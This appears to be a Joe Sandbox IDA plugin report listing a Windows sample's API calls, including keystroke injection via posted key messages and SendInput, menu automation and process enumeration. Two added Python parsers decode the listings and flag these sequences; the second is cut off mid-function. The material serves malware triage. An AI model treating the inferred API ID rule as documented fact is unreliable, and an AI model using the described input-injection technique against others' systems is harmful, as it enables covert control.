• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
• Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
• Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
• Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
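The "API ID" string in each record above (for example MessagePost$KeyboardState$Parent) is the similarity key the IDA plugin derives from the function's imported API names, and the PostMessageW calls in the two records at 0044443B and 00444633 carry literal window-message and virtual-key constants: 0x0101 and 0x0100 are WM_KEYUP and WM_KEYDOWN, and 0x10, 0x11, 0x12 and 0x5B are VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN, so each of those two functions reads and rewrites the keyboard state and then posts synthetic release (or press) messages for the four modifier keys to a parent window. The Python below is an added example, not Joe Sandbox's own code: it parses "APIs" lines copied from four records on this page, rebuilds the API ID and checks it against the reported value, and decodes the key messages. The construction rule it implements (CamelCase tokens; tokens shorter than three characters and Get/Set/For dropped; names containing an underscore kept whole; tokens grouped by call count descending, sorted alphabetically within a group, groups joined with "$") is inferred from these four records only, not taken from Joe Sandbox documentation, and is an assumption that may not hold for every record.

```python
"""Parse Joe Sandbox IDA Plugin "APIs" lines, re-derive the "API ID" similarity
string, and decode WM_KEYDOWN/WM_KEYUP + virtual-key constants.

Added example, not Joe Sandbox code. The API ID rule is INFERRED from the four
records below (assumption); WM_/VK_ values are the standard Windows constants.
"""
import re
from collections import Counter

# Sample input: "APIs" lines copied from this report, one string per function.
RECORD_FOLDER = """
• CoInitialize.OLE32(00000000), ref: 0045DCAF
• SHGetMalloc.SHELL32(?), ref: 0045DCB9
• CoUninitialize.OLE32 ref: 0045DCC3
• SHGetDesktopFolder.SHELL32(00000000,?), ref: 0045DD62
• SHBrowseForFolderW.SHELL32(?), ref: 0045DE0E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DE30
• CoUninitialize.OLE32 ref: 0045DE7E
"""
RECORD_KEYUP = """
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
"""
RECORD_CLEANUP = """
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
"""
RECORD_WINDOW = """
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
"""
# API ID printed in the report for each record above.
REPORTED = {
    "folder": (RECORD_FOLDER, "FolderUninitialize$BrowseDesktopFromInitializeListMallocPath"),
    "keyup": (RECORD_KEYUP, "MessagePost$KeyboardState$Parent"),
    "cleanup": (RECORD_CLEANUP, "DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow"),
    "window": (RECORD_WINDOW, "Window$Enable$Show$MessageMoveSend"),
}

# One "APIs" line: Name.MODULE(args), ref: ADDR  -- the argument list is optional
# (see "CoUninitialize.OLE32 ref: 0045DCC3"); "?" marks an unresolved argument.
API_LINE = re.compile(
    r"^\s*•?\s*(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
STOPWORDS = {"Get", "Set", "For"}          # inferred stoplist (assumption)
WM = {0x0100: "WM_KEYDOWN", 0x0101: "WM_KEYUP"}
VK = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}

def parse_api_lines(text):
    """Return [(name, module, [args], ref)] for every APIs line in text."""
    out = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            out.append((m["name"], m["module"], args, m["ref"]))
    return out

def tokens(name):
    """CamelCase split; drop tokens < 3 chars (Co, SH, W, ID) and the stoplist."""
    if "_" in name:                        # e.g. ImageList_Remove stays whole
        return [name]
    parts = re.sub(r"(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])", " ", name).split()
    return [p for p in parts if len(p) >= 3 and p not in STOPWORDS]

def api_id(text):
    """Group tokens by call count (descending), sort within a group, join with '$'."""
    counts = Counter(t for name, *_ in parse_api_lines(text) for t in tokens(name))
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))

def decode_key_messages(text):
    """[(api, WM_ name, VK_ name)] for Post/SendMessageW calls with a key message."""
    out = []
    for name, _mod, args, _ref in parse_api_lines(text):
        if name not in ("PostMessageW", "SendMessageW") or len(args) < 3:
            continue
        try:
            msg, wparam = int(args[1], 16), int(args[2], 16)
        except ValueError:                 # "?" = not resolved statically
            continue
        if msg in WM:
            out.append((name, WM[msg], VK.get(wparam, hex(wparam))))
    return out

def verify_against_report():
    """{record: (derived API ID, reported API ID)} so any mismatch is visible."""
    return {k: (api_id(txt), rep) for k, (txt, rep) in REPORTED.items()}

if __name__ == "__main__":
    for k, (got, want) in verify_against_report().items():
        print(f"{k:8s} {'OK ' if got == want else 'BAD'} {got}")
    for api, msg, vk in decode_key_messages(RECORD_KEYUP):
        print(f"{api}: {msg} {vk}")
```

Running it reproduces all four reported API IDs and lists the key-up function as posting WM_KEYUP for VK_SHIFT, VK_CONTROL, VK_MENU and VK_LWIN in that order; the record with SendMessageW(?,00000469,?,...) yields no key message because its wParam is unresolved ("?"). The numeric "API String ID" (for example 87235514-0) is not reproduced here; the page gives no basis for how it is computed.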
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
• Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
• Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
• Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                                  APIs
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 896007046-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                                  • SendMessageW.USER32(03311C00,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                                  • SendMessageW.USER32(03311C00,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                                                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                                                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses
                                                                                                                                                                  • String ID: I=D
                                                                                                                                                                  • API String ID: 2155911829-2605949546
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                                  • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3429747543-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                  • API String ID: 3850602802-3636473452
                                                                                                                                                                  APIs
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3985565216-0
APIs
• GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
• LoadStringW.USER32(00000000), ref: 00434060
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
• LoadStringW.USER32(00000000), ref: 00434078
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0043409C
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00465559
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
• gethostbyname.WSOCK32(?), ref: 004655A6
• GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
• GlobalFree.KERNEL32(00000000), ref: 0046575C
• WSACleanup.WSOCK32 ref: 00465762
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Global$AllocByteCharCleanupFreeMultiStartupWidegethostbynameinet_addr
• String ID:
• API String ID: 867222529-0
APIs
• GetClientRect.USER32(?,?), ref: 004302E6
• GetWindowRect.USER32(00000000,?), ref: 00430316
• GetClientRect.USER32(?,?), ref: 00430364
• GetSystemMetrics.USER32(0000000F), ref: 004303B1
• GetWindowRect.USER32(?,?), ref: 004303C3
• ScreenToClient.USER32(?,?), ref: 004303EC
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
APIs
• GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,00000000), ref: 00425153
• MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 004251D9
• MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 0042524C
• MultiByteToWideChar.KERNEL32(00000000,00000009,00425333,00000000,00000000,00000000), ref: 00425265
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• MultiByteToWideChar.KERNEL32(00000000,00000001,00425333,00000000,00000000,00000000), ref: 004252C1
• CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 004252D5
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$AllocateCompareHeapInfoString
• String ID:
• API String ID: 1019172818-0
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostStringWindow
• String ID:
• API String ID: 3481743490-0
• Opcode ID: 75ea3710cde785a3badf6c116863c36f9491e4eb60511417b382fa9c507b668b
• Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
• Opcode Fuzzy Hash: 75ea3710cde785a3badf6c116863c36f9491e4eb60511417b382fa9c507b668b
• Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,7FFFFFFF,00000100,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,7FFFFFFF,00000001,00000000,7FFFFFFF), ref: 0041C69C
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041C70A
• LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0041C726
• LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 0041C75F
• LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 0041C7C5
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041C7E4
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ByteCharMultiStringWide$AllocateHeap
• String ID:
• API String ID: 1400492145-0
• Opcode ID: 121c2e71a63d83f202090fb515f4f119a3fa74be0ae2761aea1c77af5e92b77f
• Instruction ID: c47f3d818bad9736da72325d1ab4489a7f384eb940dec42a4d47e01db447a74c
• Opcode Fuzzy Hash: 121c2e71a63d83f202090fb515f4f119a3fa74be0ae2761aea1c77af5e92b77f
• Instruction Fuzzy Hash: C151AD7294010AEFDF119FA4CCC18EF7BB6EB88354B24452BF925A2250D778CCA1DB58
APIs
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
• Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
• Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
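The two USER32 listings above are the parts of this report a triager actually reads: one function walks a window's menu (GetMenu, GetMenuItemCount, GetMenuStringW, GetMenuItemID, GetSubMenu) and then posts message 0x0111, which is WM_COMMAND; the other reads and rewrites the keyboard state and posts 0x0100, 0x0104 and 0x0102 (WM_KEYDOWN, WM_SYSKEYDOWN, WM_CHAR) before calling SendInput, which is how a program types into another window. The report prints only the raw hex, so the following is an added example, not part of the Joe Sandbox report or its IDA plugin: a small Python parser for these "APIs" listing lines that resolves the uMsg argument of Post/SendMessage calls to its winuser.h name and flags the two sequences. The sample input is copied from the two listings above; the line regex, the message table and the two flag functions are this example's own assumptions about the listing format, not a Joe Sandbox API.

```python
"""Decode Joe Sandbox "APIs" listing lines and flag keystroke-injection and
menu-automation call sequences.  Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: the two USER32 listings from this report.
SAMPLE_MENU = """\
• Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
"""
SAMPLE_KEYS = """\
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
"""

# Message IDs seen in this report (values from winuser.h / commctrl.h).
WINDOW_MESSAGES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN",
    0x0111: "WM_COMMAND",
    0x130C: "TCM_SETCURSEL",  # TCM_FIRST (0x1300) + 12
}
MESSAGE_APIS = {"PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"}
KEY_MESSAGES = {"WM_KEYDOWN", "WM_KEYUP", "WM_CHAR", "WM_SYSKEYDOWN"}

# Assumed line shape: "• [Part of subcall function X: ]Api.Module[(args)], ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list        # int for a resolved constant, None for "?"
    ref: int          # address of the call site
    subcall: bool     # True when the line was a "Part of subcall function" entry


def parse_api_listing(text: str) -> list:
    """Parse every call line; headings and blank lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if not raw or not raw.strip() else [
            None if a.strip() == "?" else int(a.strip(), 16) for a in raw.split(",")
        ]
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), "subcall function" in line))
    return calls


def decode_message(call: ApiCall) -> Optional[str]:
    """Name the uMsg (second) argument of a Post/SendMessage call, else None."""
    if call.api not in MESSAGE_APIS or len(call.args) < 2 or call.args[1] is None:
        return None
    return WINDOW_MESSAGES.get(call.args[1], "0x%04X" % call.args[1])


def flags_keystroke_injection(calls: list) -> bool:
    """SendInput, or keyboard-state access plus posted key messages: the
    sequence used to type into another process's window."""
    apis = {c.api for c in calls}
    touches_kbd_state = bool(apis & {"GetKeyboardState", "SetKeyboardState"})
    posts_keys = any(decode_message(c) in KEY_MESSAGES for c in calls)
    return "SendInput" in apis or (touches_kbd_state and posts_keys)


def flags_menu_automation(calls: list) -> bool:
    """Menu enumeration followed by a posted WM_COMMAND: invoking a menu
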